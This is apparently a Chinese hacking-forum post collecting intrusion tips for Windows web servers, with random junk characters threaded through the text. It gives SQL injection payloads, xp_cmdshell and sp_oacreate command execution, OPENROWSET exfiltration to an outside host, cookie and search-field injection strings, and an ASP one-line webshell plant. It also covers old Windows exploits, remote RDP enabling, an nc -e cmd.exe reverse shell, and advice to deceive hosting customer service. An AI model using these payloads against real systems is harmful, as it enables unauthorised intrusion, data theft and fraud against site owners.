SA点数据库分离技术相关
0 E! ]7 `$ o k" }
% m/ w. K' b( S& L# ^0 b$ H( b5 ?6 u+ g
SA点数据库分离搞法+语句:! S; B% l! |- C! `
3 `# A: z5 D8 |8 V! @' s- c
注射点不显错,执行下面三条语句页面都返回正常。
3 f4 P0 i: H* r3 C3 y$ N! ^$ a3 m: jand 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread')
4 _ K8 l. o, A/ Z, m, a$ {; gand 1=(select count(*) FROM master.dbo.sysobjects where name= 'sp_makewebtask')8 _5 k0 G3 W8 U" L! I
and 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')
* C- Y9 r9 \$ _& `可以列目录,判断系统为2000,web与数据库分离& u/ k6 W8 H) U
遇到这种情况首先要想办法得到数据库IP来进行下一步得渗透了。$ {" O2 T& \& E
在注射点上执行
: Y( c% J/ P; \/ x* F" H7 F7 _declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd /c net user ';--, J# t6 m' W( ?3 y) \
页面返回正常,通过上面这个命令执行telnet我一个外网肉鸡得1433端口,然后netstat/an没有得到IP
" s7 w, T% d, y5 c还有我用NC监听得其他端口都没有得到IP。
( x6 g8 F# {* B6 E' N5 i5 f% p% s9 S- ~1 I0 p5 @( h
通过注射点执行下面这两个命令页面都返回异常,在肉鸡上面同样也是没有得到IP。% D3 b3 h- _6 J- Z. j/ j) O {& e
'insert into opendatasource('sqloledb','server=xxx.xxx.xxx.xxx;uid=sasa;pwd=sasa;database=tempdb').tempdb.dbo.temp select name from master.dbo.sysdatabases--
. n$ m, [- Z$ B7 o% F X+ G' ^+ _. m, c, z `& s. C; ~0 u
;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=pass;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433;', 'select * from dest_table') select * from src_table;--0 |( b+ ^' a( l( r; |
5 j- F a6 g x' T9 G8 \! o现在就猜想是不是数据库是内网而且不能连外网。
/ Q5 w/ f2 n' y3 f5 \
& H: g2 e6 q% f( `( Q
+ g6 R' v: P# U# ~5 |- N& eaccess导出txt文本代码 v4 X! Y: r5 y$ [+ x6 ]2 q
SELECT * into [test.txt] in 'd:\web\' 'text;' from admin
) V! a7 o, v1 a* E- P3 F J9 `
- B9 M1 R& A, \$ m3 [$ E* S# z6 J ?
& d2 Z5 a1 w( P, T/ Q, \9 w自动跳转到指定网站代码头8 {+ z& R7 r. b
<body onload='vbscript:document.links(0).href="http://www.google.com":document.links(0).innerHTML="www.sohu.com"'>. j+ j0 J5 z9 S% T+ Q4 w% N! X
5 f! L7 N3 e8 @, q1 Q8 |8 l6 D* A, [9 _' Q+ x
入侵java or jsp站点时默认配置文件路径:2 l5 R# D; B4 K% u9 D9 G! a* d
\web-inf\web.xml
0 S: R+ Q# C( k2 O; k1 n( V0 M. otomcat下的配置文件位置:
6 C7 o. }2 C" P; y\conf\server.xml (前面加上tomcat路径)
, x' A4 A& g9 r$ Z7 I M\Tomcat 5.0\webapps\root\web-inf\struts-config.xml$ I' |* v& N3 f" g
9 Z/ j t0 B+ O8 G, p. n0 ^+ @7 T# P. ^
( \3 J+ e- j$ } s
检测注入点新方法运算符法,在过滤了and or cookies时用比有效果:4 M9 h" C! ]: o% b: W3 v$ C
-1%236 F% Q1 Y; q- Q
> U% J7 P3 z, M
<4 | d3 z: h; [* n
1'+or+'1'='1
( J9 N7 U2 n0 e; C, P- }& t% r# y, vid=8%bf
$ t+ _4 D" p5 |2 b$ A; y5 G- `2 T# Y* {( R o# U j& g
全新注入点检测试法:
. K( C7 T4 V* x$ g. D在URL地址后面加上-1,URL变成:http://gzkb.goomoo.cn/news.asp?id=123-1,如果返回的页面和前面不同,是另一则新闻,则表示有注入漏洞,是数字型的注入漏洞;在 URL地址后面加上 -0,URL变成 http://gzkb.goomoo.cn/news.asp?id=123-0,返回的页面和前面的页面相同,加上-1,返回错误页面,则也表示存在注入漏洞,是数字型的。
8 D5 [7 C5 I2 G1 B: y0 d: e5 T) o5 D `' E+ D
在URL的地址后面加上'%2B',URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2B',返回的页面和1同;加上'2%2B'asdf,URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2Basdf,返回的页面和1不同,或者说未发现该条记录,或者错误,则表示存在注入点,是文本型的。. f; F8 {+ y$ [
& Q) z% R2 `, g2 t& T搜索型注入判断方法:
( y/ X* q! s- w1 o( ?北京%' and '1'='1' and '%'=', i& t- k- s! d6 U3 t* L& u# [
北京%' and '1'='2' and '%'='
: [0 k7 W9 |! p; X
1 h9 H# I5 y* y/ E2 ~/ K
2 z% z/ f' ?2 _7 j. @COOKIES注入:
" }# x: U9 H0 b
+ d; B H/ ^) a. Sjavascript:alert(document.cookie="id="+escape("51 and 1=1"));
8 ~- K# q5 | E" g* d' n- {5 G/ Q6 O$ G# y1 p
2000专业版查看本地登录用户命令:
& {# S+ v, t. }! j- ]net config workstation* g: l4 M- r9 G4 W/ ^3 c
: V0 i4 E& n5 [, p! ~ V; i
" s1 g1 B( x5 t- a/ Y' e1 f$ a; i
2003下查看ipsec配置和默认防火墙配置命令:/ M- V/ m/ Z. D* [; A
netsh firewall show config q" S9 a% V' k( A
netsh ipsec static show all2 [+ t7 F2 U0 m0 T8 p4 Y5 Z( G1 A, |
% E. M$ b0 n- g# V6 n0 }不指派指定策略命令:# C4 J3 T9 L! B4 H2 L
netsh ipsec static set policy name=test assign=n (test是不指派的策略名)
& p* C' e1 O' a+ v1 K. Hnetsh ipsec static show policy all 显示策略名9 f# D6 V5 E- L% k% ~, K& {4 S
- l1 a( `) t& e# B0 m( F7 @
L" F, O9 [8 W7 ^- A. v- J0 Y猜管理员后台小技巧:
% N6 z$ D n* m! A8 F' }3 \admin/left.asp . H u' _( F* U$ @
admin/main.asp. c l# `. m& Q$ D
admin/top.asp' B, @5 h1 m( m
admin/admin.asp $ u3 F! O0 V5 \, m4 l
会现出菜单导航,然后迅雷下载全部链接( c1 X; }3 x2 u5 Z' X t8 T
9 [) E# { {, S" Y4 b! ~ x& I
$ `4 F4 ^6 M2 x; g社会工程学:
N# E' s% ?8 k3 E, R用这个查信息 http://tool.chinaz.com/ Whois查域名注册人和维护人
2 Z- {' e* g p8 F9 Q1 b. X然后去骗客服
4 G8 z' F, t: x4 I& N% i! Q
, e' O9 m9 k, F/ {& v
& p- i N4 {- |! `统计系统使用的是IT学习者的统计系统,在网上下载了一套回来研究。这样的系统拿webshell一般就二种:1.数据库插一句话木马,客户端连接得到。2.网站配置页面写入木马代码拿webshell。打开数据库目录,发现数据库扩展名是asp的,默认路径:data/#ITlearner.asp,把数据库扩展名改成*.mdb,用明小子的数据库工具打开,发现有防下载的表。管理员的默认密码是:ITlearner。数据库插一句话木马这条路是走不通了,现在只有看第二种方法看行不。输入默认密码进入 http://www.cnc-XX.com/admin/cutecounter /admin.asp?action=ShowConfig,查看原代码: & w% ~9 E \ Z4 N
查找 修改maxlength="3"为maxlength="100">这里是为了突破固定长度的字符输入。然后查找 处 修改为action="http://www.cnc-XX.com/admin/cutecounter/admin?Action=SaveConfig">, Q1 M6 R& T% H; o. z
存为html文件打开后在最后详细来访信息记录多少条记录,默认为100条框输入100:eval request(chr(35)),点击保存。提示无法找到,结果发现。+ R7 V- F8 c. ~& W
- }/ j+ r7 v3 a6 f( b
) v. h3 u+ f" H0 T4 [$ O3 l! F
, l9 W" A+ m/ v# F2 H0 k6. 554端口 用real554.exe入侵。 6129端口 用dameware6129.exe入侵。 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)( g: ]. b3 Z8 X! f2 R
) w' [8 l& T* n, N
! P% f& ^9 O: }( G5 |; A! |" p9 w& [. Q- _, R# H) q
CMD加密注册表位置
7 D) x/ C% H0 e! w' e+ o; l5 N! b& _(1)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor/ f; w. g, y: X& Y r0 d( Q# X& q; l
AutoRun3 b+ H! a; X0 k- I9 T: Z# f+ M
: H- r+ n$ L9 Z1 t
(2)HKEY_CURRENT_USER\Software\Microsoft\Command Processor
^* ~+ Q" Q" p; h9 W: u q ?2 C" ^AutoRun) Q6 ^. {% m3 Z; H0 ^; y
! Q, h1 e4 s7 b- b( F9 t3 t8 w
; k( S; |5 U1 G' {2 {
在找注入时搜索Hidden,把他改成test$ I# R0 v& A9 l# @; |
. Z: T) ?6 k# E5 b
% F q) `8 n6 R0 {# W2 H) n9 R& n9 z$ q& q- z
mstsc /v:IP /console # t# N6 k/ x: F+ _% [# m' K% M
. _: o- R2 w2 G: s9 y2 P
( h- a! k5 |$ @" B* J, a
一句话开3389:# l. v4 S: i' G! ^% V1 }
: C/ b& K: n8 y' t/ O最近我在网上看到新出了一种方法,一句话开3389,不过好像听说只能用于2003系统,唉,还是写出来和大家分享一下吧.很简单的,wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 adh=Kp e!w 8 kw`=wSH> 2 a" R/ G) b9 [0 c3 k- g8 r" d
开远程:WMIC /node:"远程机器名" /user:"administrator" /password:"lcx" RDTOGGLE WHERE ServerName='远程机器名' call SetAllowTSConnections 1 就是这样了,其实还有其他的一些方法开2003的3389,我这里也不多作介绍了,大家有空上网一查就知道了.
' l9 V. F; n% h7 `& T! |: c% \5 n+ e" n0 z# C4 V& \
. A- h: Q: B8 j, P, }% d3 v知道表名,字段,使用SQL语句在ACCESS数据库中加个用户名及密码语句如下:
: z" x- n* k" Q8 J6 IInsert into admin(user,pwd) values('test','test'): B8 R8 N. N7 |3 A7 l
. O8 s1 g7 Q; ?) ]0 R) X- y8 d# @9 R9 E2 I+ p; f
NC反弹
3 M7 R- c3 Z0 ^$ t先在本机执行: nc -vv -lp 监听的端口 (自己执行) + Q- G) G3 V3 u2 d6 G' E$ k
然后在服务器上执行: nc -e cmd.exe 自己的IP 和监听的端口 (对方执行)! Q7 V, u2 y7 ?8 s. {
" s q" l; G8 O4 K9 v) ]2 g/ f A! S: a) _; ~9 g# P' V2 C% _
在脚本入侵过程中要经常常试用%00来确认下参数是否有问题( ^ F* R8 ]4 o7 q
: B, S7 Q" e. V! N
有时候我们入侵的时候,在webshell没有办法列举网站的目录包括dir也不行的时候,这个时候可以尝试用DOS命令SUBST转移目录' O% R: E( M4 P h7 r! n9 V
例如:
0 P$ ^+ H* k( X+ S8 j' Jsubst k: d:\www\ 用d盘www目录替代k盘
- V2 h1 d3 |, F% ?3 J) g$ isubst k: /d 解除K盘代替 |
匿名
发表于 2017-12-20 02:36:51
发表于 2012-9-15 14:41:29
收藏
支持
反对